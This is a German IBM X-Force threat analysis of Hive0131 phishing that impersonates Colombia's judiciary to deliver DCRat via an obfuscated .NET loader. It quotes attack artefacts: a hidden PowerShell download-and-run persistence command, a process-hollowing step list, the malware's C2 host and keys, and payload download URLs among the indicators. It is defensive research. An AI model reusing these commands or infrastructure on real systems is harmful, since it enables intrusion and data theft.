IBM X-Force Bedrohungsanalyse: DCRAT-Präsenz wächst in Lateinamerika

Eine Hand, die auf einem Laptop mit rotem Sicherheitsschild tippt, während E-Mail-Grafiken über der Tastatur schweben

Anfang Mai 2025 beobachtete IBM X-Force, wie Hive0131 E-Mail-Kampagnen mit elektronischen Benachrichtigungen über Strafverfahren gegen Nutzer in Kolumbien durchführte, die angeblich von der Justiz Kolumbiens stammten. Hive0131 ist eine finanziell motivierte Gruppe, die vermutlich aus Südamerika stammt und routinemäßig Kampagnen hauptsächlich in Lateinamerika (LATAM) durchführt, um eine breite Palette an Payloads zu verbreiten. Die aktuellen Kampagnen imitieren offizielle Korrespondenz und enthalten entweder einen eingebetteten Link oder einen PDF-Köder mit einem eingebetteten Link. Ein Klick auf den eingebetteten Link initiiert die Infektionskette, um den Banking-Trojaner „DCRat“ im Speicher auszuführen. 

DCRat wird als Malware-as-a-Service (Malware) betrieben, tauchte erstmals mindestens im Jahr 2018 auf und wurde stark in russischen Cyberkriminalitätsforen beworben. Ein zweimonatiges Abonnement kostet etwa 7 US-Dollar. Die Präsenz von DCRat ist weit verbreitet und erfreut sich seit mindestens 2024 in LATAM zunehmender Beliebtheit. Im Sommer 2024 beobachtete X-Force mehrere Kampagnen, die sich stark auf Unternehmen in Kolumbien konzentrierten und ein Unternehmen LATAM imitierten, das sich auf elektronische Dokumenten-Ökosysteme in Mexiko und Kolumbien spezialisiert hat. Aufgrund der Unterschiede in der Infektionskette und der Bereitstellung von DCRat geht X-Force jedoch davon aus, dass die Kampagne aus dem Jahr 2024 und die aktuellen Kampagnen von unterschiedlichen Akteuren durchgeführt wurden. Die im Jahr 2024 beobachteten Kampagnen stützten sich stark auf passwortgeschützte RAR-Archive mit NSIS, um einen GuLoader-Downloader auszuführen, während die aktuellen Kampagnen auf einen obfuskierten .NET-Loader zurückgreifen, den wir VMDetectLoader genannt haben. 

DCRat-Funktionen

  • Umgeht AMSI
  • Erkennt Analyseumgebungen
  • Beendet blocklistete Prozesse
  • Etabliert Persistenz über geplante Aufgaben oder einen Registrierungsschlüssel
  • Empfängt Befehle von einem Command-and-Control-Server (C2-Server)

DCRat wird mit Plugins ausgeliefert, die folgende Aufgaben ausführen können, wobei Bedrohungsakteure auch benutzerdefinierte Plugins erstellen können, um zusätzliche Aufgaben umzusetzen:

  • Aufnahme eines Opfers über das Mikrofon oder die Kamera des Computers
  • Hoch- und Herunterladen von Dateien
  • Befehle ausführen
  • Erfassung von Systeminformationen
  • Verschlüsselung und Entschlüsselung von Dateien
  • Bearbeitung von Registrierungsschlüsseln
  • Protokollierung von Tastenanschlägen und Daten aus der Zwischenablage
  • Manipulation des Dateisystems

Bedrohungsart

MaaS

Mann schaut auf Computer

Verstärken Sie Ihre Sicherheitsintelligenz  

Bleiben Sie Bedrohungen immer einen Schritt voraus mit Neuigkeiten und Erkenntnissen zu Sicherheit, KI und mehr, die Sie wöchentlich im Think Newsletter erhalten.  

Analyse

Anfang Mai 2025 beobachtete X-Force E-Mail-Kampagnen von Hive0131, die die kolumbianische Justiz (Rama Judicial de Colombia) imitierten und vorgaben, vom Zivilgerichtshof von Bogotá, Kolumbien, zu stammen, um elektronische Benachrichtigungen über Strafverfahren zu versenden. Die beobachteten Kampagnen enthalten entweder einen PDF-Köder mit einem Link zu einer TinyURL oder einen eingebetteten Link zu einem Google Docs-Speicherort. 

Übersicht der Infektionskette – PDF mit TinyURL

Bei den E-Mails mit einem PDF-Köder, der zu einer TinyURL führt, wird das Opfer auf ein ZIP-Archiv mit dem Namen 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue umgeleitet. Das ZIP-Archiv enthält harmlose Dateien sowie eine schädliche JavaScript-Datei mit dem Namen 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.js. Die JavaScript-Datei lädt eine JavaScript-Payload von einer Paste[.]ee-Website herunter und führt sie aus. Diese Payload führt anschließend einen PowerShell-Befehl aus, der ein JPG von hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg herunterlädt, wobei am Ende der Datei ein Base64-kodierter Loader angehängt ist. Nach der Ausführung lädt der Loader DCRat herunter und führt es im Speicher aus.

Der Loader trägt den Namen VMDetectLoader , da er erkennen kann, ob er in einer Sandbox-Umgebung ausgeführt wird. Die Analyse zeigt, dass der Loader auf dem Open-Source-Projekt https://github.com/robsonfelix/VMDetector basiert.

RAMA-Infektionskette
Abbildung 1: RAMA-Infektionskette
Beispiel-E-Mail mit PDF-Köder
Abbildung 2: Beispiel-E-Mail mit PDF-Köder

Übersicht der Infektionskette – Eingebetteter Google Docs-Link

Diese Infektionskette wird durch Phishing-E-Mails ausgelöst, die einen Link zu einem Google-Docs-Download eines passwortgeschützten ZIP-Archivs namens CUI 158616000129-2025-10047_122011111777.zip enthalten, dessen Passwort in der E-Mail angegeben ist und 3004 lautetDas Archiv enthält einen Batch-Datei-Downloader, CUI 158616000129-2025-10047_122011111777.bat, der eine obfuskierte VBScript-Komponente (VBS) herunterlädt undhxxp://paste[.]ee/d/jYHEqBJ3/0  nach %WinDir%\Temp\Pernambuco.vbs ausführt. Das VBS-Skript dekodiert und führt anschließend ein Base64-codiertes PowerShell-Skript aus, das VMDetectLoader  über eine JPG-Datei herunterlädthxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
Die endgültige Payload wird dann von VMDetectLoader über Paste[.]ee-URL heruntergeladen, die ihm vom PowerShell-Skript übergeben wird.

RAMA-Infektionskette mit Google Docs
Abbildung 3: RAMA-Infektionskette mit Google Docs
Beispiel-E-Mail mit Google Docs-Link
Abbildung 4: Beispiel-E-Mail mit Google-Docs-Link

VMDetectLoader

VMDetectLoader ist ein obfuskierter .NET-Loader (Microsoft.Win32.TaskScheduler.dll), der auf VirusTotal unter https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7 zu finden sind. Die Analyse der Metadaten des Loaders zeigt, dass der Code auf dem Open-Source-Projekt https://github.com/robsonfelix/VMDetector basiert.

Assembly-Attribute:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Bevor die Payload geladen wird, erkennt der Loader virtuelle Maschinen und gibt bei erkannter VM eine Liste der Host-Attribute auf der Konsole aus. Zum Beispiel:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Kernfunktionalität

VMDetectLoader wird über seine dnlib.IO.Home.VAI()  -Funktion ausgeführt und erhält Daten, die den folgenden ähneln. Diese Informationen können je nach Kampagne variieren.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argument

Beschreibung

$storeman

 Umgekehrte Pastee-URL, von der eine Base64-kodierte Payload heruntergeladen wird. 

MSBuilld

 Zielinjektionsprozess

C:\Users\Public\Downloads
rhabdosteus
js

 Pfad, der beim Erstellen einer geplanten Aufgabe verwendet wird: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Flag, das Prozessprüfungen anzeigt

bimetallism

 Name der geplanten Aufgabe

Während der Ausführung entschlüsselt VMDetectLoader bei Bedarf relevante Zeichenfolgen aus der .NET-Ressource „hIXS“ per XOR.

Ein Beispiel für entschlüsselte Zeichenfolgen in Ordnern

Beispielhafte entschlüsselte Zeichenketten

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistenz

Sofern entsprechend konfiguriert, wird eine geplante Aufgabe erstellt, die den folgenden PowerShell-Befehl ausführt, der eine JavaScript-Payload herunterlädt und ausführt:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Eine weitere Aufgabe kann, sofern konfiguriert, erstellt werden, um die JavaScript-Payload mit folgendem Befehl auszuführen:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

Der Loader kann außerdem einen Registry-Run-Key erstellen, um die Payload auszuführen:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Process Injection

VMDetectLoader verfügt über die Fähigkeit, die Process Hollowing Injection-Technik zu nutzen, um eine Payload in verschiedene Zielprozessinstanzen zu laden. Zum Beispiel ist für die analysierte Kampagne entweder C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-Bit) oder C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-Bit) der Zielprozess. Die Funktion, die für die Prozessinjektion verantwortlich ist, heißt HackForums.gigajew.x64.Load() für 64-Bit-Samples und dnlib.IO.Tools.Ande() für 32-Bit-Samples.

Process-Hollowing-Injection-Prozess:

  1. Erstellen Sie einen angehaltenen Prozess mit CreateProcess(), wobei die dwCreationFlags auf CREATE_SUSPENDED (4) gesetzt sind.
  2. Geben Sie den Speicher im Zielprozess mit ZwUnmapViewOfSection() frei.
  3. Weisen Sie dem Zielprozess mit VirtualAllocEx() neuen Speicher zu.
  4. Schreiben Sie die Payload mit WriteProcessMemory() in den neu zugewiesenen Speicher.
  5. Aktualisieren Sie den Entry Point des Prozesses mit GetThreadContext() und SetThreadContex().
  6. Führen Sie ResumeThread () aus, um den Code auszuführen.

DCRat

Wenn VMDetectLoader feststellt, dass es in einer sicheren Umgebung ausgeführt wird, wird die finale Payload durch Process Hollowing geladen. In diesem Fall handelt es sich bei der finalen Payload um DCRat mit den folgenden Konfigurationsdaten.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Zusammenfassung

X-Force verfolgt mehrere Gruppen, die im lateinamerikanischen Bedrohungsumfeld aktiv sind und E-Mail-Kampagnen zur Bereitstellung von MaaS durchführen, um finanzielle Gewinne zu erzielen. Zu den überwachten Gruppen gehören Hive0148 und Hive0149, die sich auf die Verbreitung des Grandoriero-Banking-Trojaners konzentrieren, Hive0153, die die Malware Adwind und SambaSpy verbreiten, sowie Hive0131. Obwohl sich Hive0131 in der Regel auf Operationen mit Malware wie QuasarRAT und NjRAT konzentriert, hat X-Force eine Zunahme von Kampagnen mit DCRat beobachtet. Angesichts der stetigen und anhaltenden Beobachtungen von Malware, die an Benutzer in LATAM ausgeliefert wird, geht IBM X-Force davon aus, dass Lateinamerika auch weiterhin Ziel von Bedrohungsakteuren sein wird, die versuchen, Banking-Trojaner über Phishing-Kampagnen einzusetzen, um Zugangsdaten und andere sensible Informationen zu erlangen.

Empfehlungen

Organisationen in LATAM werden ermutigt, bei E-Mails mit Anhängen, Links oder Download-Aufforderungen vorsichtig zu sein. Darüber hinaus wird Unternehmen empfohlen, Folgendes zu tun:

  • Seien Sie vorsichtig bei E-Mails, die Links oder Download-Aufforderungen enthalten
  • Überwachen Sie hostbasierte Hinweise auf Process Injection, die Erstellung unerwünschter Prozesse, die Erstellung geplanter Aufgaben und Registry-Änderungen
  • Installieren, aktualisieren und konfigurieren Sie Endpoint-Sicherheitssoftware
  • Überwachen Sie die Endgerätregeln.
  • Suchen Sie nach der Umgehung der Ausführungsrichtlinie

Indikatoren für Kompromittierungen

Indikator

 Art des Indikators

  Kontext

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 Carrier-Datei 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 ZIP-Archiv

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Obfuscated .NET Loader

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 ZIP-Archiv

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 PS-Skript

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 PS-Skript

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Batch Script Downloader

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Eingebetteter PDF-Link

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 Payload Download-URL

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Eingebetteter E-Mail-Link

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 Payload Download-URL

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 JPG-Download-URL

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   -URL

 JPG-Download-URL

IBM X-Force Premier Threat Intelligence ist nun mit OpenCTI integriert und liefert umsetzbare Threat-Intelligence zu dieser Bedrohungsaktivität und mehr. Erhalten Sie Erkenntnisse zu Bedrohungsakteuren, Malware und Branchenrisiken. Installieren Sie den OpenCTI-Connector, um die Erkennung und Reaktion zu verbessern und Ihre Cybersicherheit mit der Expertise von IBM X-Force zu stärken. Bleiben Sie einen Schritt voraus—integrieren Sie noch heute.

